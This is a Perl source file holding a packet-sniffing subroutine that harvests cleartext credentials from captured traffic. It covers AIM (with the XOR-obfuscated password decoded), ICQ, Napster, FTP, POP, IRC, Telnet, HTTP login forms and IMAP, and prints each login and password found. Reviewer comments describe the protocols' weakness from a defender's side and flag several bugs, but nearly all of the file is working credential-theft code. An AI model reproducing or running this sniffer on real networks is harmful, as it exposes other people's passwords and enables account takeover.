# -sam k (commport5@lucidx.com)

# pwsniff - per-packet handler that pattern-matches TCP payloads for
# credentials and prints every match to STDOUT in cleartext.
#
# Arguments: only $_[2] is read. It is presumably the raw captured frame
# handed over by the capture loop -- confirm against the caller.
#
# Globals read:    $offset_all, $snft, $packet_all, @enctoc
# Globals written: %pwsniff, %telnet, $saddr, $daddr, $sport, $dport, $data,
#                  $ascii, $asci, $seq, $stest, $dtest, $name, $enc,
#                  $decrypted, $ftplgn, $ftpps, $poplgn, $popps
#
# What this shows from a defender's side: every protocol handled below puts
# the credential on the wire unencrypted (AIM TOC only XORs it with a fixed
# key), so any passive observer on the path can read it. The mitigation is
# the TLS-wrapped or challenge-response variant of each protocol.
#
# Accuracy caveats when reading the output as evidence:
#  - Protocols are identified by port number only.
#  - Matching is done on one packet at a time; nothing here reassembles a
#    TCP stream, so a credential split across segments is not matched.
#  - The FTP, POP and telnet state lives in package globals rather than per
#    connection, so values from concurrent sessions can be paired together.
sub pwsniff {
 my ($alla, $call) = ($offset_all, $_[2]);
 # First call only: build the set of enabled protocols from the
 # comma-separated list in $snft.
 if (!%pwsniff) {
  foreach (split(/,\s*/, $snft)) {
   $pwsniff{$_} = 1;
  }
 }
 # Load the raw bytes into the shared packet object at offset $alla.
 # NOTE(review): bset/get look like the Net::RawIP API -- confirm.
 $packet_all->bset($call, $alla);
# ($vers,$ihl,$tos,$tot,$id,$frg,$ttl,$pro,$chc,$saddr,$daddr,$sport,$dport,$seq,$aseq,$dof,$res1,$res2,$urg,$ack,$psh,$rst,$syn,$fin,$win,$chk,$data) =
# $packet_all->get({ip=>['version','ihl','tos','tot_len','id','frag_off','ttl','protocol','check','saddr','daddr'],tcp=>[
# 'source','dest','seq','ack_seq','doff','res1','res2','urg','ack','psh','rst','syn','fin','window','check','data']});
# $data = substr($_[2], 34 + (unpack("C", substr($_[2], 46, 1))) / 4);
 # Only addresses, ports and payload are extracted now; the fuller field
 # list above is disabled. These are package globals, not lexicals.
 ($saddr,$daddr,$sport,$dport,$data) =
 $packet_all->get({ip => ['saddr', 'daddr'], tcp => ['source', 'dest', 'data']});
 $ascii = $data;
 # NOTE(review): $seq is not assigned anywhere in this sub (the get() that
 # filled it is commented out), so this edits whatever the global holds.
 $seq =~ s/^-//;
 # ip2dot is defined outside this block; presumably numeric address to
 # dotted quad -- confirm.
 $stest = &ip2dot($saddr);
 $dtest = &ip2dot($daddr);
 # --- AIM (TOC), port 9898 ---
 if ($pwsniff{'aim'} and ($sport == 9898 or $dport == 9898)) {
#  @idstr = (0x00, 0x00, 0x00, 0x01, 0x00, 0x01);
#  @encoscar = (0xf3, 0x26, 0x81, 0xc4, 0x39, 0x86, 0xdb, 0x92, 0x71, 0xa3, 0xb9, 0xe6, 0x53, 0x7a, 0x95, 0x7c);
#  @enctoc = (0x54, 0x69, 0x63, 0x2f, 0x54, 0x6f, 0x63);
  # Captures the screen name and the hex string after "0x" from a
  # toc_signon line. The class [^\s+] also excludes a literal '+'.
  if (($name, $enc) = $ascii =~ /toc_signon [^\s]+ \d+ ([^\s+]+) 0x([^\s+]+) /) {
   # One iteration per hex pair: decode the byte and XOR it with the
   # repeating key in @enctoc.
   # NOTE(review): the only definition of @enctoc visible here is the
   # commented-out line above. If it is empty at runtime, the modulus
   # below is by zero, which is fatal in Perl -- confirm where it is set.
   for (0 .. ((length($enc) - 1) / 2)) { 
    $decrypted .= chr(hex(substr($enc, ($_ * 2), 2)) ^ $enctoc[$_ % scalar(@enctoc)])
   }
  }
  # NOTE(review): $decrypted is a global that this sub only appends to and
  # never clears, so text from an earlier packet stays in front of later
  # output, and a non-matching packet on this port can reprint it.
  if ($name and $decrypted) {
   print "AIM:\tlogin: $name\tpassword: $decrypted\n";
  }
 }
 # --- ICQ, port 4000 ---
 # The payload is percent-encoded first so the binary framing around the
 # password can be matched as text. No login name is extracted.
 if ($pwsniff{'icq'} and ($sport == 4000 or $dport == 4000)) {
  $asci = uri_escape($data);
  if ($asci =~ /\w%13%00%00%08%00([^%]+)%00r%00%04%00%00%00%00%00%04/) {
   print "ICQ:\tlogin: N/A\tpassword: $1\n";
  }
 }
 # --- Napster, port 8888 ---
 # Matches payloads that start with two space-separated tokens followed by
 # a number and one more token.
 if ($pwsniff{'napster'} and ($sport == 8888 or $dport == 8888)) {
  if ($ascii =~ /^(\S+) (\S+) \d+ \S+/) {
   print "Napster:\tlogin: $1\tpassword: $2\n";
  }
 }
 # --- FTP control channel, port 21 ---
 # USER and PASS normally arrive in separate packets, so each half is held
 # in a global until both are present, then printed and cleared.
 if ($pwsniff{'ftp'} and ($sport == 21 or $dport == 21)) {
  if ($ascii =~ /USER ([^\s]+)/) {
   $ftplgn = "FTP:\tlogin: $1\t";
  }
  if ($ascii =~ /PASS ([^\s]+)/) {
   $ftpps =  "password: $1\n";
  }
  if ($ftplgn and $ftpps) {
   print $ftplgn . $ftpps;
   $ftplgn = $ftpps = undef;
  }
 }
 # --- POP, ports 106, 109, 110 and 995 ---
 # Same two-step USER/PASS pairing as FTP, with the endpoints prefixed.
 # Port 995 is normally POP3 over TLS, where the payload is encrypted and
 # these patterns would not be expected to match.
 if ($pwsniff{'pop'} and (($sport == 106 or $dport == 106) or ($sport == 109 or $dport == 109) or ($sport == 110 or $dport == 110) or ($sport == 995 or $dport == 995))) {
  if ($ascii =~ /USER ([^\s]+)/) {
   $poplgn = "\tlogin: $1\t";
  }
  if ($ascii =~ /PASS ([^\s]+)/) {
   $popps = "password: $1\n";
  }
  if ($poplgn and $popps) {
   print "POP: $stest -> $dtest -";
   print $poplgn . $popps;
#   print "POP: $dtest -";
#   print $poplgn . $popps;
   $poplgn = $popps = undef;
  }
 }
 # --- IRC operator login ---
 # NOTE(review): the two port tests are independent. The condition holds
 # whenever either port is >= 6000 and either port is <= 8000, and they
 # need not be the same port, so it also passes for traffic that is not in
 # the 6000-8000 range at all.
 if ($pwsniff{'irc'} and (($sport >= 6000 or $dport >= 6000) and ($sport <= 8000 or $dport <= 8000))) {
  if ($ascii =~ /OPER (\S+) (\S+)/) {
   print "IRC:\tlogin: $1\tpassword: $2\n";
  }
 }
 # --- Telnet, port 23 ---
 # Small state machine kept in %telnet. After a "login:" or "password:"
 # prompt is seen, later payloads are appended to the user or pass buffer
 # until a payload containing a carriage return (\cM) arrives; that payload
 # itself is not appended. Traffic direction is not checked, so bytes from
 # either side of the session end up in the buffers.
 if ($pwsniff{'telnet'} and ($sport == 23 or $dport == 23)) {
  if ($telnet{'login'}) {
   unless ($ascii =~ /\cM/) {
    $telnet{'user'} .= $ascii;
   }
   else {
    $telnet{'login'} = 0;
   }
  }
  if ($telnet{'password'}) {
   unless ($ascii =~ /\cM/) {
    $telnet{'pass'} .= $ascii;
   }
   else {
    # End of password entry: print the pair and reset both buffers.
    $telnet{'password'} = 0;
    print "Telnet:\tlogin: $telnet{'user'}\tpassword: $telnet{'pass'}\n";
    undef($telnet{'pass'});
    undef($telnet{'user'});
   }
  }
  # The prompts are checked after the buffers, so the prompt packet itself
  # is never appended. Both matches are unanchored and case-insensitive;
  # any payload containing "login:" (a "Last login:" banner, for example)
  # also arms the user buffer.
  if ($ascii =~ /login:/i) {
   $telnet{'login'}++;
  }
  if ($ascii =~ /password:/i) {
   $telnet{'password'}++;
  }
 }
 # --- HTTP form fields, ports 80 and 8080 ---
 # The payload is URL-decoded, then searched for common login and password
 # parameter names. Both patterns require a literal '&' before the name.
 # The two prints are independent, so a login without a password leaves an
 # unterminated output line.
 if ($pwsniff{'web'} and (($sport == 80 or $dport == 80) or ($sport == 8080 or $dport == 8080))) {
  $asci = uri_unescape($data);
  $asci =~ s/&login=submit//;
#  if ($asci =~ /&(?:$httpl)=([^(?:&|\s+|$)]+)/i) {
  if ($asci =~ /&(?:acctname|alias|domain|fname|email|id|login|loginid|loginname|login_id|mn|name|uid|unickname|user|userid|user_id|username|username_login|u2_username|fullhpd)=([^&\s]+)/i) {
   print "Web:\tlogin: $1\t";
  }
  if ($asci =~ /&(?:pass|passname|passwd|password|password1|password_from_form|password_login|pw|upasswd|u2_password)=([^&\s]+)/i) {
#  if ($asci =~ /&(?:$httpp)=([^(?:&|\s+|$)]+)/i) {
   print "password: $1\n";
  }
 }
# if ($pwsniff{'web'}) {
#  $ascii = uri_unescape($data);
#  $ascii =~ s/&login=submit//;
#  if ($ascii =~ /&fullhpd=([^(?:&|\s+|$)]+)/) {
#   print "Web:\tlogin: $1\t";
#  }
#  elsif ($ascii =~ /&userid=([^(?:&|\s+|$)]+)/) {
#   print "Web:\tlogin: $1\t";
#  }
#  elsif ($ascii =~ /&username=([^(?:&|\s+|$)]+)/) {
#   print "Web:\tlogin: $1\t";
#  }
#  elsif ($ascii =~ /&login=([^(?:&|\s+|$)]+)/) {
#   print "Web:\tlogin: $1\t";
#  }
#  elsif ($ascii =~ /&user[^=]*=([^(?:&|\s+|$)]+)/) {
#   print "Web:\tlogin: $1\t";
#  }
#  if ($ascii =~ /&pass=([^(?:&|\s+|$)]+)/) {
#   print "password: $1\n";
#  }
#  elsif ($ascii =~ /&passwd=([^(?:&|\s+|$)]+)/) {
#   print "password: $1\n";
#  }
#  elsif ($ascii =~ /&password=([^(?:&|\s+|$)]+)/) {
#   print "password: $1\n";
#  }
#  elsif ($ascii =~ /&pass[^=]+=([^(?:&|\s+|$)]+)/) {
#   print "password: $1\n";
#  }
# }
 # --- IMAP, ports 143 and 220 ---
 # NOTE(review): each capture group is exactly one non-quote character, and
 # the command tag is fixed at "2" with a lowercase "login", so only that
 # narrow form matches.
 if ($pwsniff{'imap'} and (($sport == 143 or $dport == 143) or ($sport == 220 or $dport == 220))) {
  if ($data =~ /2 login "([^"])" "([^"])"/) {
   print "IMAP:\tlogin: $1\t";
   print "password: $2\n";
  }
 }
}

# Conventional true value so that loading this file with require/do succeeds.
1;
